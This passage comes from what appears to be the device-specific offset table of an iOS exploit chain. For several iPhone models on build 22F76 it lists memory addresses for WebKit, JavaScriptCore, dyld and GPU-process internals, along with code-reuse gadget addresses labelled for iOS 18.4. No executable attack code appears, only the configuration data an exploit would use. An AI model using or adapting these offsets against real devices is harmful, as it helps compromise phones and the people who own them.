ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be678n, 1416 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1417 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1418 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1419 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1420 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1421 PerfPowerServicesReader_cstring: 0x257ed3e60n, 1422 RemoteGraphicsContextGLWorkQueue: 0x1eda5ec18n, 1423 RemoteRenderingBackendProxy_off: 0x830n, 1424 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1425 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1426 Security__gSecurityd: 0x1eb67fd78n, 1427 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1428 UI_m_connection: 0x28n, 1429 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1430 WebCore__PAL_getPKContactClass: 0x1eda62e78n, 1431 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1432 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1433 WebCore__initPKContact_once: 0x1eda6b9b8n, 1434 WebCore__initPKContact_value: 0x1eda6b9c0n, 1435 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6a180n, 1436 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6a178n, 1437 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6a160n, 1438 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1439 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1440 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1441 WebProcess_singleton: 0x1eda5fdc0n, 1442 __pthread_head: 0x269b08020n, 1443 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1444 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1445 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1446 dyld__signPointer: 0x1a9a3f3e4n, 1447 emptyString: 0x1edb14420n, 1448 free_slabs: 0x1ed9a5790n, 1449 gadget_control_1_ios184: 0x23f0da2ecn, 1450 gadget_control_2_ios184: 0x1ad86ac28n, 1451 gadget_control_3_ios184: 0x21f281150n, 1452 gadget_loop_1_ios184: 0x1865f818cn, 1453 gadget_loop_2_ios184: 0x20d255da8n, 1454 gadget_loop_3_ios184: 0x184d29f1cn, 1455 gadget_set_all_registers_ios184: 0x20dfce16cn, 1456 jsc_base: 0x19a45a000n, 1457 libARI_cstring: 0x218adf820n, 1458 libGPUCompilerImplLazy__invoker: 0x23ce7f7e8n, 1459 libGPUCompilerImplLazy_cstring: 0x23bfc9870n, 1460 libdyld__dlopen: 0x1ad86c7b8n, 1461 libdyld__dlsym: 0x1ad86da34n, 1462 libdyld__gAPIs: 0x1ed5b8000n, 1463 libsystem_c__atexit_mutex: 0x1ed8cac58n, 1464 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1465 libsystem_pthread_base: 0x20d2a4000n, 1466 m_backend: 0x70n, 1467 m_drawingArea: 0x50n, 1468 m_gpuProcessConnection: 0x158n, 1469 m_gpuProcessConnection_m_identifier: 0x38n, 1470 m_imageBuffer: 0x18n, 1471 m_isRenderingSuspended: 0xe8n, 1472 m_platformContext: 0x38n, 1473 m_remoteDisplayLists: 0x70n, 1474 m_remoteRenderingBackendMap: 0xe8n, 1475 m_webProcessConnections: 0x80n, 1476 mach_task_self_ptr: 0x1ed8c9ec0n, 1477 mainRunLoop: 0x1edb2c020n, 1478 privateState_off: 0x7e8n, 1479 pthread_create_jsc: 0x19bd26f30n, 1480 pthread_create_offset: 0x6988n, 1481 runLoopHolder_tid: 0x1edb3c708n, 1482 rxBufferMtl_off: 0x100n, 1483 rxMtlBuffer_off: 0x70n, 1484 vertexAttribVector_off: 0x2548n 1485 }, 1486 "iPhone14,8_22F76": { 1487 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf498n, 1488 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadef80n, 1489 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadeee0n, 1490 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadef30n, 1491 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade328n, 1492 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 1493 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 1494 CAPointer: 0x20n, 1495 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 1496 CGContextDelegate: 0x28n, 1497 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 1498 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 1499 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 1500 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 1501 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 1502 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 1503 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 1504 DesktopServicesPriv_bss: 0x1ecca3a08n, 1505 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ec048n, 1506 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1507 GPUProcess_singleton: 0x1eb924a98n, 1508 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 1509 HOMEUI_cstring: 0x182f75636n, 1510 IOSurfaceContextDelegate: 0x120n, 1511 IOSurfaceDrawable: 0x150n, 1512 IOSurfaceQueue: 0x48n, 1513 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 1514 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be9b0n, 1515 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be660n, 1516 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be668n, 1517 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be670n, 1518 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be5b0n, 1519 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be678n, 1520 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1521 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1522 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1523 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1524 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1525 PerfPowerServicesReader_cstring: 0x257ed3e60n, 1526 RemoteGraphicsContextGLWorkQueue: 0x1eda5ec18n, 1527 RemoteRenderingBackendProxy_off: 0x830n, 1528 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1529 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1530 Security__gSecurityd: 0x1eb67fd78n, 1531 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1532 UI_m_connection: 0x28n, 1533 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1534 WebCore__PAL_getPKContactClass: 0x1eda62e78n, 1535 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1536 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1537 WebCore__initPKContact_once: 0x1eda6b9b8n, 1538 WebCore__initPKContact_value: 0x1eda6b9c0n, 1539 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6a180n, 1540 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6a178n, 1541 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6a160n, 1542 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1543 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1544 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1545 WebProcess_singleton: 0x1eda5fdc0n, 1546 __pthread_head: 0x269b08020n, 1547 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1548 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1549 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1550 dyld__signPointer: 0x1a9a3f3e4n, 1551 emptyString: 0x1edb14420n, 1552 free_slabs: 0x1ed9a5790n, 1553 gadget_control_1_ios184: 0x23f0da2ecn, 1554 gadget_control_2_ios184: 0x1ad86ac28n, 1555 gadget_control_3_ios184: 0x21f281150n, 1556 gadget_loop_1_ios184: 0x1865f818cn, 1557 gadget_loop_2_ios184: 0x20d255da8n, 1558 gadget_loop_3_ios184: 0x184d29f1cn, 1559 gadget_set_all_registers_ios184: 0x20dfce16cn, 1560 jsc_base: 0x19a45a000n, 1561 libARI_cstring: 0x218adf820n, 1562 libGPUCompilerImplLazy__invoker: 0x23ce7f7e8n, 1563 libGPUCompilerImplLazy_cstring: 0x23bfc9870n, 1564 libdyld__dlopen: 0x1ad86c7b8n, 1565 libdyld__dlsym: 0x1ad86da34n, 1566 libdyld__gAPIs: 0x1ed5b8000n, 1567 libsystem_c__atexit_mutex: 0x1ed8cac58n, 1568 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1569 libsystem_pthread_base: 0x20d2a4000n, 1570 m_backend: 0x70n, 1571 m_drawingArea: 0x50n, 1572 m_gpuProcessConnection: 0x158n, 1573 m_gpuProcessConnection_m_identifier: 0x38n, 1574 m_imageBuffer: 0x18n, 1575 m_isRenderingSuspended: 0xe8n, 1576 m_platformContext: 0x38n, 1577 m_remoteDisplayLists: 0x70n, 1578 m_remoteRenderingBackendMap: 0xe8n, 1579 m_webProcessConnections: 0x80n, 1580 mach_task_self_ptr: 0x1ed8c9ec0n, 1581 mainRunLoop: 0x1edb2c020n, 1582 privateState_off: 0x7e8n, 1583 pthread_create_jsc: 0x19bd26f30n, 1584 pthread_create_offset: 0x6988n, 1585 runLoopHolder_tid: 0x1edb3c708n, 1586 rxBufferMtl_off: 0x100n, 1587 rxMtlBuffer_off: 0x70n, 1588 vertexAttribVector_off: 0x2548n 1589 }, 1590 "iPhone15,2_22F76": { 1591 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae35d8n, 1592 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae30c0n, 1593 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3020n, 1594 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3070n, 1595 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2468n, 1596 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 1597 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 1598 CAPointer: 0x20n, 1599 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 1600 CGContextDelegate: 0x28n, 1601 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 1602 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 1603 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 1604 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 1605 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 1606 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 1607 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 1608 DesktopServicesPriv_bss: 0x1ecca7a08n, 1609 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0188n, 1610 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1611 GPUProcess_singleton: 0x1eb928a98n, 1612 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 1613 HOMEUI_cstring: 0x182f79636n, 1614 IOSurfaceContextDelegate: 0x120n, 1615 IOSurfaceDrawable: 0x150n, 1616 IOSurfaceQueue: 0x48n, 1617 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 1618 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2af0n, 1619 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c27a0n, 1620 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c27a8n, 1621 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c27b0n, 1622 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c26f0n, 1623 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c27b8n, 1624 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 1625 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 1626 JavaScriptCore__jitAllowList: 0x1edb424a0n, 1627 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 1628 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 1629 PerfPowerServicesReader_cstring: 0x25808ee60n, 1630 RemoteGraphicsContextGLWorkQueue: 0x1eda62d58n, 1631 RemoteRenderingBackendProxy_off: 0x830n, 1632 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 1633 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 1634 Security__gSecurityd: 0x1eb683d78n, 1635 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 1636 UI_m_connection: 0x28n, 1637 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 1638 WebCore__PAL_getPKContactClass: 0x1eda66fb8n, 1639 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 1640 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 1641 WebCore__initPKContact_once: 0x1eda6faf8n, 1642 WebCore__initPKContact_value: 0x1eda6fb00n, 1643 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e2c0n, 1644 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e2b8n, 1645 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e2a0n, 1646 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 1647 WebProcess_ensureGPUProcessConnection: 0x199199958n, 1648 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 1649 WebProcess_singleton: 0x1eda63f00n, 1650 __pthread_head: 0x26a888020n, 1651 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 1652 dyld__RuntimeState_vtable: 0x1f2875aa0n, 1653 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 1654 dyld__signPointer: 0x1a9a433e4n, 1655 emptyString: 0x1edb18420n, 1656 free_slabs: 0x1ed9a98d0n, 1657 gadget_control_1_ios184: 0x23f1202ecn, 1658 gadget_control_2_ios184: 0x1ad86ec28n, 1659 gadget_control_3_ios184: 0x21f289150n, 1660 gadget_loop_1_ios184: 0x1865fc18cn, 1661 gadget_loop_2_ios184: 0x20d25dda8n, 1662 gadget_loop_3_ios184: 0x184d2df1cn, 1663 gadget_set_all_registers_ios184: 0x20dfd616cn, 1664 jsc_base: 0x19a45e000n, 1665 libARI_cstring: 0x218ae7820n, 1666 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 1667 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 1668 libdyld__dlopen: 0x1ad8707b8n, 1669 libdyld__dlsym: 0x1ad871a34n, 1670 libdyld__gAPIs: 0x1ed5bc000n, 1671 libsystem_c__atexit_mutex: 0x1ed8ced98n, 1672 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 1673 libsystem_pthread_base: 0x20d2ac000n, 1674 m_backend: 0x70n, 1675 m_drawingArea: 0x50n, 1676 m_gpuProcessConnection: 0x158n, 1677 m_gpuProcessConnection_m_identifier: 0x38n, 1678 m_imageBuffer: 0x18n, 1679 m_isRenderingSuspended: 0xe8n, 1680 m_platformContext: 0x38n, 1681 m_remoteDisplayLists: 0x70n, 1682 m_remoteRenderingBackendMap: 0xe8n, 1683 m_webProcessConnections: 0x80n, 1684 mach_task_self_ptr: 0x1ed8ce000n, 1685 mainRunLoop: 0x1edb30020n, 1686 privateState_off: 0x7e8n, 1687 pthread_create_jsc: 0x19bd2af30n, 1688 pthread_create_offset: 0x6988n, 1689 runLoopHolder_tid: 0x1edb40708n, 1690 rxBufferMtl_off: 0x100n, 1691 rxMtlBuffer_off: 0x70n, 1692 vertexAttribVector_off: 0x2548n 1693 }, 1694 "iPhone15,3_22F76": { 1695 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae35d8n, 1696 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae30c0n, 1697 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae3020n, 1698 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3070n, 1699 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2468n, 1700 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 1701 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 1702 CAPointer: 0x20n, 1703 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 1704 CGContextDelegate: 0x28n, 1705 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 1706 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 1707 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 1708 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 1709 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 1710 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 1711 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 1712 DesktopServicesPriv_bss: 0x1ecca7a08n, 1713 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0188n, 1714 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1715 GPUProcess_singleton: 0x1eb928a98n, 1716 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 1717 HOMEUI_cstring: 0x182f79636n, 1718 IOSurfaceContextDelegate: 0x120n, 1719 IOSurfaceDrawable: 0x150n, 1720 IOSurfaceQueue: 0x48n, 1721 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 1722 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2af0n, 1723 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c27a0n, 1724 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c27a8n, 1725 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c27b0n, 1726 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c26f0n, 1727 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c27b8n, 1728 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 1729 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 1730 JavaScriptCore__jitAllowList: 0x1edb424a0n, 1731 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 1732 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 1733 PerfPowerServicesReader_cstring: 0x25808ee60n, 1734 RemoteGraphicsContextGLWorkQueue: 0x1eda62d58n, 1735 RemoteRenderingBackendProxy_off: 0x830n, 1736 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 1737 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 1738 Security__gSecurityd: 0x1eb683d78n, 1739 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 1740 UI_m_connection: 0x28n, 1741 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 1742 WebCore__PAL_getPKContactClass: 0x1eda66fb8n, 1743 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 1744 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 1745 WebCore__initPKContact_once: 0x1eda6faf8n, 1746 WebCore__initPKContact_value: 0x1eda6fb00n, 1747 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e2c0n, 1748 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e2b8n, 1749 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e2a0n, 1750 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 1751 WebProcess_ensureGPUProcessConnection: 0x199199958n, 1752 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 1753 WebProcess_singleton: 0x1eda63f00n, 1754 __pthread_head: 0x26a888020n, 1755 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 1756 dyld__RuntimeState_vtable: 0x1f2875aa0n, 1757 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 1758 dyld__signPointer: 0x1a9a433e4n, 1759 emptyString: 0x1edb18420n, 1760 free_slabs: 0x1ed9a98d0n, 1761 gadget_control_1_ios184: 0x23f1202ecn, 1762 gadget_control_2_ios184: 0x1ad86ec28n, 1763 gadget_control_3_ios184: 0x21f289150n, 1764 gadget_loop_1_ios184: 0x1865fc18cn, 1765 gadget_loop_2_ios184: 0x20d25dda8n, 1766 gadget_loop_3_ios184: 0x184d2df1cn, 1767 gadget_set_all_registers_ios184: 0x20dfd616cn, 1768 jsc_base: 0x19a45e000n, 1769 libARI_cstring: 0x218ae7820n, 1770 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 1771 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 1772 libdyld__dlopen: 0x1ad8707b8n, 1773 libdyld__dlsym: 0x1ad871a34n, 1774 libdyld__gAPIs: 0x1ed5bc000n, 1775 libsystem_c__atexit_mutex: 0x1ed8ced98n, 1776 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 1777 libsystem_pthread_base: 0x20d2ac000n, 1778 m_backend: 0x70n, 1779 m_drawingArea: 0x50n, 1780 m_gpuProcessConnection: 0x158n, 1781 m_gpuProcessConnection_m_identifier: 0x38n, 1782 m_imageBuffer: 0x18n, 1783 m_isRenderingSuspended: 0xe8n, 1784 m_platformContext: 0x38n, 1785 m_remoteDisplayLists: 0x70n, 1786 m_remoteRenderingBackendMap: 0xe8n, 1787 m_webProcessConnections: 0x80n, 1788 mach_task_self_ptr: 0x1ed8ce000n, 1789 mainRunLoop: 0x1edb30020n, 1790 privateState_off: 0x7e8n, 1791 pthread_create_jsc: 0x19bd2af30n, 1792 pthread_create_offset: 0x6988n, 1793 runLoopHolder_tid: 0x1edb40708n, 1794 rxBufferMtl_off: 0x100n, 1795 rxMtlBuffer_off: 0x70n, 1796 vertexAttribVector_off: 0x2548n 1797 }, 1798 "iPhone15,4_22F76": { 1799 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae3798n, 1800 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae3280n, 1801 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae31e0n, 1802 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3230n, 1803 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2628n, 1804 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 1805 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 1806 CAPointer: 0x20n, 1807 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 1808 CGContextDelegate: 0x28n, 1809 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 1810 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 1811 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 1812 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 1813 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 1814 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 1815 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 1816 DesktopServicesPriv_bss: 0x1ecca7a08n, 1817 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0348n, 1818 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1819 GPUProcess_singleton: 0x1eb928a98n, 1820 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 1821 HOMEUI_cstring: 0x182f79636n, 1822 IOSurfaceContextDelegate: 0x120n, 1823 IOSurfaceDrawable: 0x150n, 1824 IOSurfaceQueue: 0x48n, 1825 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 1826 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2cb0n, 1827 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2960n, 1828 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2968n, 1829 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2970n, 1830 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c28b0n, 1831 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2978n, 1832 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 1833 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 1834 JavaScriptCore__jitAllowList: 0x1edb424a0n, 1835 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 1836 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 1837 PerfPowerServicesReader_cstring: 0x257f2fe60n, 1838 RemoteGraphicsContextGLWorkQueue: 0x1eda62f18n, 1839 RemoteRenderingBackendProxy_off: 0x830n, 1840 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 1841 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 1842 Security__gSecurityd: 0x1eb683d78n, 1843 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 1844 UI_m_connection: 0x28n, 1845 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 1846 WebCore__PAL_getPKContactClass: 0x1eda67178n, 1847 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 1848 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 1849 WebCore__initPKContact_once: 0x1eda6fcb8n, 1850 WebCore__initPKContact_value: 0x1eda6fcc0n, 1851 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e480n, 1852 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e478n, 1853 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e460n, 1854 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 1855 WebProcess_ensureGPUProcessConnection: 0x199199958n, 1856 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 1857 WebProcess_singleton: 0x1eda640c0n, 1858 __pthread_head: 0x269eb0020n, 1859 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 1860 dyld__RuntimeState_vtable: 0x1f2875aa0n, 1861 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 1862 dyld__signPointer: 0x1a9a433e4n, 1863 emptyString: 0x1edb18420n, 1864 free_slabs: 0x1ed9a9a90n, 1865 gadget_control_1_ios184: 0x23f1202ecn, 1866 gadget_control_2_ios184: 0x1ad86ec28n, 1867 gadget_control_3_ios184: 0x21f289150n, 1868 gadget_loop_1_ios184: 0x1865fc18cn, 1869 gadget_loop_2_ios184: 0x20d25dda8n, 1870 gadget_loop_3_ios184: 0x184d2df1cn, 1871 gadget_set_all_registers_ios184: 0x20dfd616cn, 1872 jsc_base: 0x19a45e000n, 1873 libARI_cstring: 0x218ae7820n, 1874 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 1875 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 